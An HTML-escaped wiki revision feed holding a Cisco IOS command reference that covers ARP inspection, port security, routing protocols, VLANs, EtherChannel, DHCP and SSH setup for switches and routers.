By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using default administrative distance values listed in the section below.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example manually defining the administrative distance&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
! Routing protocol !!  Administrative distance&lt;br /&gt;
|- &lt;br /&gt;
| Directly connected interface || 0{{efn|Only the interface itself has an administrative distance of 0, since a route cannot have a distance of less than 1.}}&amp;lt;ref name=&amp;quot;Cisco AD&amp;quot;&amp;gt;{{citation |title=Default AD |url=http://www.cisco.com/c/en/us/support/docs/ip/border-gateway-protocol-bgp/15986-admin-distance.html#topic2 |author1=Cisco}}&amp;lt;/ref&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| Static route || 1&lt;br /&gt;
|- &lt;br /&gt;
| Dynamic Mobile Network Routing (DMNR)  || 3&lt;br /&gt;
|- &lt;br /&gt;
| [[EIGRP]] summary route || 5&lt;br /&gt;
|- &lt;br /&gt;
| External [[BGP]] || 20&lt;br /&gt;
|- &lt;br /&gt;
| [[EIGRP]] internal route || 90&lt;br /&gt;
|- &lt;br /&gt;
| [[IGRP]] || 100&lt;br /&gt;
|- &lt;br /&gt;
| [[OSPF|Open Shortest Path First]] (OSPF) || 110&lt;br /&gt;
|- &lt;br /&gt;
| [[IS-IS|Intermediate System to Intermediate System]] (IS-IS) || 115&lt;br /&gt;
|- &lt;br /&gt;
| [[Routing Information Protocol]] (RIP) || 120&lt;br /&gt;
|- &lt;br /&gt;
| [[Exterior Gateway Protocol]] (EGP) || 140&lt;br /&gt;
|- &lt;br /&gt;
| [[On Demand Routing|ODR]]|| 160&lt;br /&gt;
|- &lt;br /&gt;
| [[EIGRP]] external route || 170&lt;br /&gt;
|- &lt;br /&gt;
| Internal [[BGP]] || 200&lt;br /&gt;
|-&lt;br /&gt;
| [[Next Hop Resolution Protocol]] (NHRP) || 250&amp;lt;ref name=&amp;quot;Cisco NHRP&amp;quot;&amp;gt;{{citation |title=NHRP |url=https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_nhrp/command/reference/irn_book/nhrp-commands--a-through-z.html#wp8534493760 |author1=Cisco}}&amp;lt;/ref&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| Default static route learned via DHCP || 254{{citation needed|date=October 2018}}&lt;br /&gt;
|- &lt;br /&gt;
| Unknown and unused || 255{{efn|An administrative distance of 255 will cause the router to remove the route from the routing table and not use it.}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1122</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1122"/>
		<updated>2026-02-23T22:36:05Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Assign IPv4 Default Route / Default Gateway (Router) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway (switch) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
